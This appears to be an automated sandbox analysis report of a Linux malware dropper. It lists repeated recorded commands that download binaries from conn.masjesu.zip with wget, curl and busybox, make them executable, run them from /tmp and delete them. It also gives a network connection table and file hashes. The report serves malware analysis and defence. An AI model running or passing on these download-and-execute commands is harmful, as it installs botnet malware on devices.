[wget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]

/bin/chmod

[chmod 777 fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]

/tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3

[./fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]

/bin/rm

[rm fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]

/bin/chmod

[chmod 777 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]

/tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP

[./5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]

/bin/rm

[rm 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]

/bin/chmod

[chmod 777 NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]

/tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q

[./NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]

/bin/rm

[rm NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]

/bin/chmod

[chmod 777 HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]

/tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB

[./HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]

/bin/rm

[rm HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]

/bin/chmod

[chmod 777 gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]

/tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6

[./gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]

/bin/rm

[rm gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]

/bin/chmod

[chmod 777 Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]

/tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em

[./Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]

/bin/rm

[rm Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]

/bin/chmod

[chmod 777 hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]

/tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ

[./hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]

/bin/rm

[rm hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]

/bin/chmod

[chmod 777 XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]

/tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx

[./XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]

/bin/rm

[rm XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]

/bin/chmod

[chmod 777 nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]

/tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD

[./nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]

/bin/rm

[rm nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]

/bin/chmod

[chmod 777 DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]

/tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l

[./DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]

/bin/rm

[rm DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

/bin/chmod

[chmod 777 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

/tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA

[./QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

/bin/rm

[rm QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]

/bin/chmod

[chmod 777 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]

/tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ

[./BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]

/bin/rm

[rm BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]

/bin/chmod

[chmod 777 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]

/tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F

[./37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]

/bin/rm

[rm 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

/tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

/tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ

MD5 7689ca8c5bc85cf6b78ef89323d4df6a
SHA1 a1392ec3b571b3de167f0b9a5dadab4f14a2db76
SHA256 17dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5
SHA512 40f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471